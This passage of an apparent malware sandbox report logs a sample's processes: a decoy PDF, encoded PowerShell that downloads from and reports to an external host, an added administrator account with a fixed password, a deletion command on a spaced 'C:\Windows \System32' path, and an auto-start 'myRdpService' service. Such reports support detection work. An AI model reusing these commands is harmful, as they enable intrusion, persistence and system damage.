gB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF9A.tmp" "c:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2352 --field-trial-handle=1644,i,17074868649269977898,11316506185755287373,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
